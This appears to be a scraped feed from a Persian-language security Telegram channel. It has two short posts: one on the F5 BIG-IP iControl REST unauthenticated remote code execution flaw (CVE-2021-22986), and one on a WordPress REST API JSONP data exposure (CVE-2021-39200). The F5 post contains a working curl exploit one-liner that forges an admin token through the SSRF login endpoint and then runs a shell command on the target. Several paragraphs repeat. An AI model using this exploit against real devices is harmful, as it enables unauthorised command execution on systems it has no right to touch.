#F5_iControl #REST Unauthenticated RCE (#SSRF) #CVE-2021-22986
باز هم سرویس های API این بار REST بر روی محصولات BIG-IP که یک آسیب پذیری در سطح Critical در نسخه 16.0x که میتواند منجر به اجرای کد بر روی سرور مربوطه شود، نوع آسیب پذیری SSRF بوده و کد بهره برداری زیر میباشد.
┌──(unk9vvn㉿avi)-[~]
└─$
@Unk9vvN
باز هم سرویس های API این بار REST بر روی محصولات BIG-IP که یک آسیب پذیری در سطح Critical در نسخه 16.0x که میتواند منجر به اجرای کد بر روی سرور مربوطه شود، نوع آسیب پذیری SSRF بوده و کد بهره برداری زیر میباشد.
┌──(unk9vvn㉿avi)-[~]
└─$
token=`curl -i -k -s -X $'POST' -H "Host: $TARGET" -H $'Accept-Language: en' -H $'Authorization: Basic YWRtaW46' -H $'Content-Type: application/json' -H $'Content-Length: 109' -H $'Connection: close' -b $'BIGIPAuthCookie=1234' --data-binary $'{\"username\":\"admin\",\x0d\x0a\"userReference\":{},\x0d\x0a\"loginReference\":{\"link\":\"http://$TARGET/mgmt/shared/gossip\"}\x0d\x0a}' "http://$TARGET/mgmt/shared/authn/login" | grep "{" | jq .token.token| sed 's/"//g'`;echo $token;curl -s -H "X-F5-Auth-Token: $token" -H "Content-Type: application/json" "http://$TARGET/mgmt/tm/util/bash" -d '{"command":"run","utilCmdArgs":"-c id"}' | jq .commandResult
https://support.f5.com/csp/article/K03009991@Unk9vvN
#WordPress 5.4 to 5.8 - #Data_Exposure via #REST_API
یکی از Scope های محبوب شکارچیان باگ وب، سرویس های API هستش مثلا اخیرا روی وبسرویس های مایکروسافتی چندین آسیب پذیری که بروی Functionality های API بوده رخ داده،
از این روی دیگر وبسرویس های رایگانی که بصورت متن باز هستند هم میتونند دارای آسیب پذیری های متعددی در قسمت Backend پردازش Functionality های خود باشند،
همونطور که در تصویر میبینید یکی از توابع وبسرویس REST API که بر روی CMS مشهور Wordpress فعال هستش دارای آسیب پذیری Data Exposure یا بستر قرار داشتن داده ها هستش،
این آسیب پذیری که بر روی تابع
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39200
https://github.com/WordPress/wordpress-develop/commit/ca4765c62c65acb732b574a6761bf5fd84595706
@Unk9vvN
یکی از Scope های محبوب شکارچیان باگ وب، سرویس های API هستش مثلا اخیرا روی وبسرویس های مایکروسافتی چندین آسیب پذیری که بروی Functionality های API بوده رخ داده،
از این روی دیگر وبسرویس های رایگانی که بصورت متن باز هستند هم میتونند دارای آسیب پذیری های متعددی در قسمت Backend پردازش Functionality های خود باشند،
همونطور که در تصویر میبینید یکی از توابع وبسرویس REST API که بر روی CMS مشهور Wordpress فعال هستش دارای آسیب پذیری Data Exposure یا بستر قرار داشتن داده ها هستش،
این آسیب پذیری که بر روی تابع
()json_wp_die_handler_
هستش مامور پاسخ به Request های Json Padding یا JSONP است و نتیجتا کنترلی بر callback
این درخواست ها نبوده و باعث Leakage اطلاعات حساس میشود.https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39200
https://github.com/WordPress/wordpress-develop/commit/ca4765c62c65acb732b574a6761bf5fd84595706
@Unk9vvN